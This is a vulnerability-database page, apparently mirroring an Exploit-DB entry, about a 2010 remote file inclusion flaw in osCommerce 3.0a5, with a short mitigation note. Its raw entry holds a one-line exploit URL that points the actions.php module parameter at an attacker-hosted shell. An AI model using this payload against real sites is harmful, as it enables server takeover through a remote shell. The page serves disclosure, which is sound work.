header-logo
Suggest Exploit
vendor:
oscommerce
by:
LoSt.HaCkEr / aDaM_TRoJaN
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: oscommerce
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: oscommerce
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2010

oscommerce-3.0a5 Remote File Inclusion

A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers, an attacker can exploit a Remote File Inclusion vulnerability in oscommerce-3.0a5 by sending a specially crafted HTTP request to the vulnerable server. The request contains a malicious URL in the module parameter of the vulnerable actions.php script.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. The application should validate all user-supplied input and reject requests that contain malicious URLs.
Source

Exploit-DB raw data:

# Exploit Title: [oscommerce-3.0a5 Remote File Inclusion ] 
# Date: [26-8-2010] 
# Author: LoSt.HaCkEr  /  aDaM_TRoJaN
# Software Link: [http://www.oscommerce.com/solutions/downloads] 
# Version: [v 3.0 ] 
# Tested on: [Windows XP] 
# CVE :
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/  aDaM_TRoJaN@yahoo.com
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL]
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers

Navigation

Suggest Exploit

Services By CQR